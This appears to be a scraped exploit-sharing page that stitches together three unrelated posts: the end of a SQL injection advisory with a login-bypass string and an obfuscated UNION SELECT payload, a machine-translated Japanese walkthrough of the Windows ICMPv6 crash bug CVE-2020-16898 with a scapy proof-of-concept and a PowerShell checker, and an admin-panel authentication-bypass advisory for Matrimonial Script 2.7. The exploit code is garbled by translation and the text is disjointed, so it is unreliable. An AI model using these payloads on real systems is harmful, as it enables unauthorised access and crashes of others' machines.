# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/admin.php
# User: 'or 1=1 or ''=' Pass: anything
# 
# http://localhost/[PATH]/index.php?p=smiles&handel=[SQL]
#
# '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+-
#
# Etc...
# # # # #
HireHackking

0x00脆弱性の背景

2020年10月14日、モニタリングにより、MicrosoftがTCP/IPリモートコード実行の脆弱性のリスク通知を発行したことが発見されました。脆弱性は、IMCPV6ルーター広告パケットを処理する際のWindows TCP/IPスタックの脆弱性によって引き起こされました。リモート攻撃者は、特別に作成されたICMPV6ルーター広告パケットを構築し、リモートBSODを引き起こす可能性のあるリモートWindowsホストに送信し、脆弱性数はCVE-2020-16898でした。

0x01影響バージョン

オペレーティングシステムバージョンパッチテストWindows 10

x86/x64/arm64

1709

ショ和

Windows 10

x86/x64/arm64

1803

ショ和

Windows 10

x86/x64/arm64

1809

ショ和

Windows 10

x86/x64/arm64

1903

ショ和

Windows 10

x86/x64/arm64

1909

ショ和

Windows 10

x86/x64/arm64

2004年

ショ和

Windows Server 2019

Windows Server 2019(サーバーコアエディション)

Windows Server 1903バージョン(サーバーコアエディション)

Windows Serverバージョン1909(サーバーコアエディション)

Windows Server 2004バージョン(サーバーコアバージョン)

0x02脆弱性の原因

RFC5006の説明によると、RDNSSパッケージの長さは奇妙なはずです。攻撃者によって構築されたRDNSSパッケージの長さの長さが均等である均一である場合、Windows TCP/IPはパケット検査プロセス中の長さに応じて各パッケージのオフセットを取得し、解像度を通過し、IPv6再帰DNSサーバーのアドレスのアドレスの境界解像度の境界解像度のエラーを経て、次のRDNSのオプションを介して攻撃を妨げて攻撃オプションを使用し、次のRDNSのオプションを使用し、次のRDNSオプションを使用して、次のRDNSオプションを使用すると、次のRDNSオプションを使用して、次のRDNSオプションを使用して、次のRDNSオプションを使用して攻撃を妨げているため、攻撃を検証して攻撃を検証しました。システムのクラッシュになります。

0x03脆弱性の再発

攻撃航空機:win10x64

ターゲットマシン:Windows 10x64_1709

1.vmwareを介して被害者ホストのIPv6をオンにします

1049983-20201026093851032-1267701815.png 1049983-20201026093851533-867959393.png

2. CVE-2020-16898.pyスクリプトのIPv6アドレスを変更します。これは、攻撃マシンとターゲットマシンIPv6アドレスの元の接続IPv6アドレスです。

1049983-20201026093852105-277304902.png 1049983-20201026093852661-623439245.png#!/usr/bin/env python3

#CVE-2020-16898の概念実装/BSODエクスプロイト-WindowsTCP/IPリモートコード実行脆弱性

#著者: Adam 'PI3' Zabrocki

#http://pi3.com.pl

scapy.allからimport *

scapy.layers.inet6からIMPMPV6NDOPTEFA、ICMPV6NDOPTRDNSS、ICMPV6ND_RA、IPv6、IPv6ExthDrfragment、fragment6からインポート

V6_DST='FD1533604BA5:5A2B:1008:9D373:36D2:3360336:6496' #targettターゲットマシンIPv6アドレス

V6_SRC='FE803:3360EC1E:A7AA:6717:67C6%13' #ATTACK MANISEローカルリンクIPv6アドレス

p_test_half='a'.encode()*8 + b' \ x18 \ x30 ' + b' \ xff \ x18 '

p_test=p_test_half + 'a'.encode()*4

c=icmpv6ndoptefa()

e=icmpv6ndoptrdnss()

e.len=21

e.dns=[

'AAA:AAAAA:AAA:AAAA:FFF:AAAAAA:AAA:AAAAA33333:AAAA:AAAAAA3:AAAAAA'

'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA

'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA

'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA

'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA

'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA

'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA

'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA

'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA

'AAA:AAAA:AAA:AAAA:AAA:AAA3360AAA33:AAAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

aaa=icmpv6ndoptrdnss()

aaa.len=8

pkt=icmpv6nd_ra()/aaa/\

raw(load='a'.encode()*16*2 + p_test_half + b' \ x18 \ xa0 '*6) /c/e/c/e/c/e/c/e/c/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e

p_test_frag=ipv6(dst=v6_dst、src=v6_src、hlim=255)/\

ipv6exthdrfragment()/pkt

l=fragment6(p_test_frag、200)

L:のPの場合

送信(p)

3.最後に、コマンドPIP3インストールSCAPYを使用して依存関係パッケージをインストールし、CVE-2020-16898.pyを実行すると、ターゲットマシンにブルースクリーンが表示されます。

1049983-20201026093853020-2019763768.png 1049983-20201026093853380-926132184.png

4。ローカルチェックスクリプト:CVE-2020-16898_CHECKER.PS1

########################################################################################################################################

### 14/10/2020 -Cyril Pineiro/Synapsys -Itによって書かれています

###ネットワークインターフェイスがCVE-2020-16898 CVE-2020-16899に対して脆弱であるかどうかを確認します

###インターフェイスインデックスとエイリアスを返します

########################################################################################################################################

クリア

$ interfaces=(get -netipinterface | where {$ _。addressfamily -eq 'ipv6'})。ifindex

foreach($ interface in $ interface)

{

[bool] $ vuln=$ false

$ output=netsh int ipv6 sh interfaces interface=$ interface

foreach($ in $ output)

{

if($ line.contains( '6106') - および$ line.contains( 'enabled'))

{

[bool] $ vuln=$ true

}

}

$ netipInterfaceAlias=(((get-netipaddress -interfaceIndex $ interface | select-object interfacealias)[0])。interfacealias

if($ vuln)

{

書き込みホスト「インターフェイス」$($ interface) '' $($ netipinterfacealias) 'はcve-202020-16898 cve-2020-16899' -foregroundcolor redに対して脆弱です

}

それ以外

{

書き込みホスト「インターフェイス」$($ interface) '' $($ netipinterfacealias) ''は、CVE-2020-16898 CVE-2020-16899 '-ForeGroundColor Greenに対して脆弱ではありません

}

}

1049983-20201026093853716-1588600505.png

0x04脆弱性修正

オペレーティングシステムのバージョンを次のリンクから自分で一致させる脆弱性パッチを検索し、パッチをダウンロードしてインストールします

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-16898

0x05参照アドレス

https://github.com/momika233/cve-2020-16898-exp/blob/main/cve-2020-16898.py

https://github.com/cpo-eh/cve-2020-16898_checker/blob/main/cve-2020-16898_checker.ps1

https://github.com/ascotbe/kernelhub/tree/master/cve-2020-16898

HireHackking 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<!-- 
# Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: N/A
# Date: 27.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.mscript.in/
# Version: 2.7
# Category: Webapps
# Tested on: windows 7 / mozila firefox 
# supporting tools for testing : No-Redirect Add-on in firefox
#
--!>

# ========================================================
#
#
# admin panel Authentication bypass 
# 
# Description : An Attackers are able to completely compromise the web application built upon
# Matrimonial Script as they can gain access to the admin panel and  manage the website as an admin without
# prior authentication!
# 
# Proof of Concept : - 
# Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
# Step 2: Access http://example.com/path/admin/index.php
# 
# 
# Risk : Unauthenticated attackers are able to gain full access to the administrator panel
# and thus have total control over the web application, including content change,add admin user .. etc
#
#
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained 
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #